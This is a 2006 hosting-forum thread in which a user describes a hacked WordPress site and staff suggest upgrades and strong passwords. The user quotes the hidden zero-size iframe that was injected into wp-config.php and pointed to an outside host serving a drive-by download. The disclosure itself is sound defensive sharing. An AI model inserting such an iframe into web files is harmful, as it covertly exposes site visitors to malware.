Banagor Posted November 21, 2006 Posted November 21, 2006 Hey there, I emailed you guys about it but I figure others might want to know. My WP site was hacked a few days ago. What was happening was that when you'd hit the site with Safari or even Firefox, it would try to download a file called xpl.wmf. It also would give pop-up messages about downloading a "disk cleaner" whenever you hit the admin menu. I finally tracked down the culprit. My wp-config.php file had been modified. At the very end of the file was the follwing line: ><iframe src="http://ltds.biz/go.php?id=1874&user_name=ziggen" width=0 height=0></iframe> Which, as you can see, is bringing something up. Anyway, I made a copy of the offending file, erased it and re-upped it. Everything (so far as I can see) is now working as it should. The problem was, however, that my files were not writable. So I have no idea how they got to it or re-wrote it to include that line at the end. It must have happened only two days ago as the file date was modified on 11/19/06, and I only noticed it happening yesterday. I didn't have time to try to track it down until today though. Any others experienced with this sort of thing? I'd love to know. Also, not sure if this is in the right forum but I figured maybe everyone should know in case there are others out there with the same problem. Quote
TCH-Bruce Posted November 21, 2006 Posted November 21, 2006 What version of Wordpress are you running? Quote
Banagor Posted November 21, 2006 Author Posted November 21, 2006 I was on 2.0.4 and upgraded to 2.0.5 while I was tracking this problem. Quote
TCH-Bruce Posted November 21, 2006 Posted November 21, 2006 Version 2.0.5 did have some security related udpates in it. Not sure if that was the reason you were hacked or not but staying current is always a plus. You should open a ticket with the help desk and ask if they could check the logs. Quote
TCH-Thomas Posted November 21, 2006 Posted November 21, 2006 Also, always use a strong password which you change from time to time. Quote
Banagor Posted November 21, 2006 Author Posted November 21, 2006 Nah it's okay. I just wanted you guys to be aware of the situation. I didn't think I'd find it that fast though. But it was simply a matter of finding which file had been recently edited. BTW, what's up with you guys not being on MSN or on AIM anymore? Did I miss something? I blog very...rarely...so I never really check up on things here unless there's some sort of a problem. Quote
Head Guru Posted November 21, 2006 Posted November 21, 2006 Last time I checked, I was on AOL / MSN nearly 20 hours per day. Also looking at staff, I see: tchgurumikej online tchgurucarl online tchgurutina online tchguruandy online Quote
Banagor Posted November 21, 2006 Author Posted November 21, 2006 Hmmm...I'll check it out then. Sorry about that. The only time I'd ever use it is if there was a problem though. Again, I don't pay much attention most of the time to my site or anything else. I get a bit busy RL and this is sort of on the back burner for most of the time. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.